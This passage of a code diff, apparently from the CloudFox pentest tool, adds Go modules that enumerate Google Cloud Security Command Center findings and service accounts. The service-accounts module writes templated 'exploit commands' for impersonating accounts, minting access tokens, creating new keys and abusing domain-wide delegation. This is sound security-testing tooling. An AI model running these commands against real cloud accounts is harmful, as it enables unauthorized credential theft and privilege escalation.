+ Hidden: true, + Short: "Enumerate Security Command Center findings and recommendations", + Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. + +Features: +- Lists all active SCC findings by severity (CRITICAL, HIGH, MEDIUM, LOW) +- Shows vulnerable assets and their security issues +- Identifies security posture gaps +- Provides remediation recommendations +- Generates exploitation commands for penetration testing + +Requires Security Command Center API to be enabled and appropriate IAM permissions: +- roles/securitycenter.findingsViewer or roles/securitycenter.admin`, + Run: runGCPSecurityCenterCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type SCCFinding struct { + Name string + Category string + Severity string + State string + ResourceName string + ResourceType string + ProjectID string + Description string + CreateTime string + SourceDisplayName string + ExternalURI string +} + +type SCCAsset struct { + Name string + ResourceName string + ResourceType string + ProjectID string + FindingCount int + Severity string // Highest severity finding +} + +type SCCSource struct { + Name string + DisplayName string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SecurityCenterModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ProjectFindings map[string][]SCCFinding + ProjectAssets map[string]map[string]*SCCAsset // projectID -> (resourceName -> SCCAsset) + Sources []SCCSource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SecurityCenterOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SecurityCenterOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecurityCenterOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_SECURITYCENTER_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &SecurityCenterModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFindings: make(map[string][]SCCFinding), + ProjectAssets: make(map[string]map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating Security Command Center findings...", GCP_SECURITYCENTER_MODULE_NAME) + + // Create Security Command Center client + client, err := securitycenter.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, "Failed to create client") + return + } + defer client.Close() + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, client, logger) + } + + // Check results + allFindings := m.getAllFindings() + if len(allFindings) == 0 { + logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + + // Count findings by severity + criticalCount := 0 + highCount := 0 + mediumCount := 0 + lowCount := 0 + for _, f := range allFindings { + switch f.Severity { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + case "LOW": + lowCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", + len(allFindings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllFindings aggregates all findings across projects +func (m *SecurityCenterModule) getAllFindings() []SCCFinding { + var allFindings []SCCFinding + for _, findings := range m.ProjectFindings { + allFindings = append(allFindings, findings...) + } + return allFindings +} + +// getAllAssets aggregates all assets across projects +func (m *SecurityCenterModule) getAllAssets() map[string]*SCCAsset { + allAssets := make(map[string]*SCCAsset) + for _, projectAssets := range m.ProjectAssets { + for resourceName, asset := range projectAssets { + allAssets[resourceName] = asset + } + } + return allAssets +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SecurityCenterModule) processProject(ctx context.Context, projectID string, client *securitycenter.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + if m.ProjectAssets[projectID] == nil { + m.ProjectAssets[projectID] = make(map[string]*SCCAsset) + } + m.mu.Unlock() + + // List active findings for this project + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + // Create request to list findings + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, // Only active findings + } + + it := client.ListFindings(ctx, req) + + findingsCount := 0 + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Project %s", projectID)) + break + } + + finding := result.Finding + if finding == nil { + continue + } + + // Parse the finding + sccFinding := m.parseFinding(finding, projectID) + + m.mu.Lock() + m.ProjectFindings[projectID] = append(m.ProjectFindings[projectID], sccFinding) + + // Track affected assets + if sccFinding.ResourceName != "" { + if asset, exists := m.ProjectAssets[projectID][sccFinding.ResourceName]; exists { + asset.FindingCount++ + // Update to highest severity + if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { + asset.Severity = sccFinding.Severity + } + } else { + m.ProjectAssets[projectID][sccFinding.ResourceName] = &SCCAsset{ + Name: sccFinding.ResourceName, + ResourceName: sccFinding.ResourceName, + ResourceType: sccFinding.ResourceType, + ProjectID: projectID, + FindingCount: 1, + Severity: sccFinding.Severity, + } + } + } + + // Add to loot files + m.addFindingToLoot(sccFinding, projectID) + m.mu.Unlock() + + findingsCount++ + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d finding(s) in project %s", findingsCount, projectID), GCP_SECURITYCENTER_MODULE_NAME) + } +} + +// parseFinding converts an SCC finding to our internal structure +func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, projectID string) SCCFinding { + sccFinding := SCCFinding{ + Name: finding.Name, + Category: finding.Category, + State: finding.State.String(), + ProjectID: projectID, + ResourceName: finding.ResourceName, + Description: finding.Description, + ExternalURI: finding.ExternalUri, + } + + // Parse severity + if finding.Severity != securitycenterpb.Finding_SEVERITY_UNSPECIFIED { + sccFinding.Severity = finding.Severity.String() + } else { + sccFinding.Severity = "UNSPECIFIED" + } + + // Parse resource type from resource name + if finding.ResourceName != "" { + parts := strings.Split(finding.ResourceName, "/") + if len(parts) >= 2 { + sccFinding.ResourceType = parts[len(parts)-2] + } + } + + // Get create time + if finding.CreateTime != nil { + sccFinding.CreateTime = finding.CreateTime.AsTime().Format("2006-01-02 15:04:05") + } + + // Parse source display name from finding name + if finding.Name != "" { + // Format: organizations/{org}/sources/{source}/findings/{finding} + // or projects/{project}/sources/{source}/findings/{finding} + parts := strings.Split(finding.Name, "/") + for i, part := range parts { + if part == "sources" && i+1 < len(parts) { + sccFinding.SourceDisplayName = parts[i+1] + break + } + } + } + + return sccFinding +} + +// severityRank returns a numeric rank for severity comparison +func severityRank(severity string) int { + switch severity { + case "CRITICAL": + return 4 + case "HIGH": + return 3 + case "MEDIUM": + return 2 + case "LOW": + return 1 + default: + return 0 + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { + // Only add CRITICAL and HIGH severity findings to loot + if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { + return + } + + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FINDING: %s (%s)\n"+ + "# =============================================================================\n"+ + "# Category: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n", + finding.Name, finding.Severity, + finding.Category, + finding.ResourceName, + projectID, + ) + + if finding.Description != "" { + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + } + + if finding.ExternalURI != "" { + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) + } + + // Add gcloud commands + m.LootMap[projectID]["security-center-commands"].Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# View finding details:\n"+ + "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", + projectID, finding.Name, + ) + + // Add specific commands based on category + m.LootMap[projectID]["security-center-commands"].Contents += "# === REMEDIATION COMMANDS ===\n\n" + categoryLower := strings.ToLower(finding.Category) + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# Remove public access:\n"+ + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, + finding.ResourceName, + ) + case strings.Contains(categoryLower, "firewall"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap[projectID]["security-center-commands"].Contents += fmt.Sprintf( + "# List service account keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", + finding.ResourceName, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SecurityCenterModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, findings := range m.ProjectFindings { + // Sort findings by severity + sort.Slice(findings, func(i, j int) bool { + return severityRank(findings[i].Severity) > severityRank(findings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table for this project + assetsHeader := []string{ + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + if projectAssets, ok := m.ProjectAssets[projectID]; ok { + for _, asset := range projectAssets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][2] > assetsBody[j][2] + }) + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + projectLevelData[projectID] = SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *SecurityCenterModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFindings := m.getAllFindings() + allAssets := m.getAllAssets() + + // Sort findings by severity + sort.Slice(allFindings, func(i, j int) bool { + return severityRank(allFindings[i].Severity) > severityRank(allFindings[j].Severity) + }) + + // Main findings table + findingsHeader := []string{ + "Project Name", + "Project ID", + "Severity", + "Category", + "Resource", + "Resource Type", + "State", + "Created", + "External URI", + } + + var findingsBody [][]string + for _, f := range allFindings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + + findingsBody = append(findingsBody, []string{ + m.GetProjectName(f.ProjectID), + f.ProjectID, + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, + f.CreateTime, + externalURI, + }) + } + + // Assets table + assetsHeader := []string{ + "Project Name", + "Project ID", + "Resource", + "Resource Type", + "Finding Count", + "Max Severity", + } + + var assetsBody [][]string + for _, asset := range allAssets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + + assetsBody = append(assetsBody, []string{ + m.GetProjectName(asset.ProjectID), + asset.ProjectID, + asset.ResourceName, + resourceType, + fmt.Sprintf("%d", asset.FindingCount), + asset.Severity, + }) + } + + // Sort assets by finding count + sort.Slice(assetsBody, func(i, j int) bool { + return assetsBody[i][4] > assetsBody[j][4] + }) + + // Collect all loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + output := SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go new file mode 100644 index 00000000..660c63d2 --- /dev/null +++ b/gcp/commands/serviceaccounts.go @@ -0,0 +1,738 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAccountsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + Aliases: []string{"sa", "sas", "service-accounts"}, + Short: "Enumerate GCP service accounts with security analysis", + Long: `Enumerate GCP service accounts with detailed security analysis. + +Features: +- Lists all service accounts with metadata +- Analyzes user-managed keys (age, expiration) +- Identifies default service accounts (Compute, App Engine, etc.) +- Detects disabled service accounts +- Flags service accounts without key rotation +- Identifies impersonation opportunities + +Column Descriptions: +- Impersonation Type: The type of access a principal has TO this service account + (TokenCreator=can generate access tokens, KeyAdmin=can create keys, + ActAs=can attach SA to resources, SAAdmin=full admin, SignBlob/SignJwt=can sign as SA) +- Impersonator: The principal (user/SA/group) who has that impersonation capability`, + Run: runGCPServiceAccountsCommand, +} + +// ServiceAccountAnalysis extends ServiceAccountInfo with security analysis +type ServiceAccountAnalysis struct { + IAMService.ServiceAccountInfo + IsDefaultSA bool + DefaultSAType string // "compute", "appengine", "cloudbuild", etc. + OldestKeyAge int // Days + HasExpiredKeys bool + HasOldKeys bool // Keys older than 90 days + // Pentest: Impersonation analysis + ImpersonationInfo *IAMService.SAImpersonationInfo +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ServiceAccountsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectServiceAccounts map[string][]ServiceAccountAnalysis // projectID -> service accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + SARolesCache map[string]map[string][]string // projectID -> saEmail -> roles + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ServiceAccountsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAccountsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAccountsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &ServiceAccountsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServiceAccounts: make(map[string][]ServiceAccountAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), + SARolesCache: make(map[string]map[string][]string), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + + // Get all service accounts for stats + allSAs := m.getAllServiceAccounts() + + // Check results + if len(allSAs) == 0 { + logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + return + } + + // Count findings + withKeys := 0 + defaultSAs := 0 + impersonatable := 0 + for _, sa := range allSAs { + if sa.HasKeys { + withKeys++ + } + if sa.IsDefaultSA { + defaultSAs++ + } + if sa.ImpersonationInfo != nil && (len(sa.ImpersonationInfo.TokenCreators) > 0 || len(sa.ImpersonationInfo.KeyCreators) > 0) { + impersonatable++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", + len(allSAs), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllServiceAccounts returns all service accounts from all projects +func (m *ServiceAccountsModule) getAllServiceAccounts() []ServiceAccountAnalysis { + var all []ServiceAccountAnalysis + for _, sas := range m.ProjectServiceAccounts { + all = append(all, sas...) + } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service accounts in project: %s", projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Create service and fetch service accounts with impersonation analysis + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccountsWithImpersonation(projectID) + if err != nil { + // Fallback to basic enumeration if impersonation analysis fails + serviceAccounts, err = iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + return + } + } + + // Get impersonation info for each SA + impersonationMap := make(map[string]*IAMService.SAImpersonationInfo) + impersonationInfos, err := iamService.GetAllServiceAccountImpersonation(projectID) + if err == nil { + for i := range impersonationInfos { + impersonationMap[impersonationInfos[i].ServiceAccount] = &impersonationInfos[i] + } + } + + // Get roles for each service account (best effort) + saRoles := make(map[string][]string) + for _, sa := range serviceAccounts { + roles, err := iamService.GetRolesForServiceAccount(projectID, sa.Email) + if err == nil { + saRoles[sa.Email] = roles + } + // Silently skip if we can't get roles - user may not have IAM permissions + } + + // Analyze each service account + var analyzedSAs []ServiceAccountAnalysis + for _, sa := range serviceAccounts { + analyzed := m.analyzeServiceAccount(sa, projectID) + // Attach impersonation info if available + if info, ok := impersonationMap[sa.Email]; ok { + analyzed.ImpersonationInfo = info + } + // Attach roles if available + if roles, ok := saRoles[sa.Email]; ok { + analyzed.Roles = roles + } + analyzedSAs = append(analyzedSAs, analyzed) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectServiceAccounts[projectID] = analyzedSAs + m.SARolesCache[projectID] = saRoles + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: iam-commands/iam-enumeration for IAM policy analysis and high-privilege role flags\n\n", + } + } + + // Generate loot for each service account + for _, sa := range analyzedSAs { + m.addServiceAccountToLoot(projectID, sa) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service account(s) in project %s", len(analyzedSAs), projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } +} + +// analyzeServiceAccount performs security analysis on a service account +func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { + analyzed := ServiceAccountAnalysis{ + ServiceAccountInfo: sa, + } + + // Check if it's a default service account + analyzed.IsDefaultSA, analyzed.DefaultSAType = isDefaultServiceAccount(sa.Email, projectID) + + // Analyze keys + if len(sa.Keys) > 0 { + now := time.Now() + oldestAge := 0 + + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + // Calculate key age + keyAge := int(now.Sub(key.ValidAfter).Hours() / 24) + if keyAge > oldestAge { + oldestAge = keyAge + } + + // Check for expired keys + if !key.ValidBefore.IsZero() && now.After(key.ValidBefore) { + analyzed.HasExpiredKeys = true + } + + // Check for old keys (> 90 days) + if keyAge > 90 { + analyzed.HasOldKeys = true + } + } + } + + analyzed.OldestKeyAge = oldestAge + } + + return analyzed +} + +// isDefaultServiceAccount checks if a service account is a GCP default service account +func isDefaultServiceAccount(email, projectID string) (bool, string) { + // Compute Engine default service account + if strings.HasSuffix(email, "-compute@developer.gserviceaccount.com") { + return true, "Compute Engine" + } + + // App Engine default service account + if strings.HasSuffix(email, "@appspot.gserviceaccount.com") { + return true, "App Engine" + } + + // Cloud Build service account + if strings.Contains(email, "@cloudbuild.gserviceaccount.com") { + return true, "Cloud Build" + } + + // Cloud Functions service account (project-id@appspot.gserviceaccount.com) + if email == fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID) { + return true, "App Engine/Functions" + } + + // Dataflow service account + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // This is also used by Dataflow + return true, "Compute/Dataflow" + } + + // GKE service account + if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { + return true, "GKE" + } + + // Cloud SQL service account + if strings.Contains(email, "@gcp-sa-cloud-sql.iam.gserviceaccount.com") { + return true, "Cloud SQL" + } + + // Pub/Sub service account + if strings.Contains(email, "@gcp-sa-pubsub.iam.gserviceaccount.com") { + return true, "Pub/Sub" + } + + // Firebase service accounts + if strings.Contains(email, "@firebase.iam.gserviceaccount.com") { + return true, "Firebase" + } + + // Google APIs service account + if strings.Contains(email, "@cloudservices.gserviceaccount.com") { + return true, "Google APIs" + } + + return false, "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa ServiceAccountAnalysis) { + lootFile := m.LootMap[projectID]["serviceaccounts-commands"] + if lootFile == nil { + return + } + + keyFileName := strings.Split(sa.Email, "@")[0] + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE ACCOUNT: %s\n"+ + "# =============================================================================\n", + sa.Email, + ) + + if sa.DisplayName != "" { + lootFile.Contents += fmt.Sprintf("# Display Name: %s\n", sa.DisplayName) + } + if sa.Disabled { + lootFile.Contents += "# DISABLED\n" + } + if sa.IsDefaultSA { + lootFile.Contents += fmt.Sprintf("# Default SA: %s\n", sa.DefaultSAType) + } + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf("# DWD Enabled (Client ID: %s)\n", sa.OAuth2ClientID) + } + + // Add key summary - only show if keys exist + userKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } + } + if userKeyCount > 0 { + lootFile.Contents += fmt.Sprintf("# User Managed Keys: %d\n", userKeyCount) + } + if sa.OldestKeyAge > 90 { + lootFile.Contents += fmt.Sprintf("# WARNING: Key older than 90 days (%d days)\n", sa.OldestKeyAge) + } + + // Add impersonation info if available + if sa.ImpersonationInfo != nil { + if len(sa.ImpersonationInfo.TokenCreators) > 0 { + lootFile.Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) + } + if len(sa.ImpersonationInfo.KeyCreators) > 0 { + lootFile.Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) + } + if len(sa.ImpersonationInfo.ActAsUsers) > 0 { + lootFile.Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe service account +gcloud iam service-accounts describe %s --project=%s --format=json | jq '{email: .email, displayName: .displayName, disabled: .disabled, oauth2ClientId: .oauth2ClientId}' + +# List all keys with creation dates and expiration +gcloud iam service-accounts keys list --iam-account=%s --project=%s --format=json | jq -r '.[] | {keyId: .name | split("/") | last, keyType: .keyType, created: .validAfterTime, expires: .validBeforeTime}' + +# Get IAM policy - who can impersonate this SA +gcloud iam service-accounts get-iam-policy %s --project=%s --format=json | jq '.bindings[] | {role: .role, members: .members}' + +# Check project-level IAM bindings for this SA +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}' + +# Check what resources this SA can access +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]}' + +`, sa.Email, projectID, + sa.Email, projectID, + sa.Email, projectID, + projectID, sa.Email, sa.Email, + projectID, sa.Email) + + lootFile.Contents += fmt.Sprintf(`# === EXPLOIT COMMANDS === + +# Impersonate SA - get access token +gcloud auth print-access-token --impersonate-service-account=%s + +# Impersonate SA - get identity token (for Cloud Run/Functions) +gcloud auth print-identity-token --impersonate-service-account=%s + +# Create a new key for this SA (requires iam.serviceAccountKeys.create) +gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s + +# Activate the downloaded key +gcloud auth activate-service-account --key-file=%s-key.json + +# Test impersonation - list projects as this SA +gcloud projects list --impersonate-service-account=%s + +`, sa.Email, sa.Email, keyFileName, sa.Email, projectID, keyFileName, sa.Email) + + // Add DWD exploitation if enabled + if sa.OAuth2ClientID != "" { + lootFile.Contents += fmt.Sprintf(`# === DOMAIN-WIDE DELEGATION EXPLOITATION === +# This SA has DWD enabled - can impersonate Workspace users! +# OAuth2 Client ID: %s + +# Run the domain-wide-delegation module for detailed exploitation: +# cloudfox gcp domain-wide-delegation -p %s + +# Quick test - requires SA key and target Workspace user email: +# python dwd_exploit.py --key-file %s-key.json --subject admin@domain.com --all-scopes + +`, sa.OAuth2ClientID, projectID, keyFileName) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for service accounts table +// Columns are grouped logically: +// - Identity: Project, Email, Display Name, Disabled, Default SA +// - Keys: User Managed Keys, Google Managed Keys, Oldest Key Age +// - Permissions: DWD, Roles, SA Attack Paths +// - Impersonation: IAM Binding Role, IAM Binding Principal +func (m 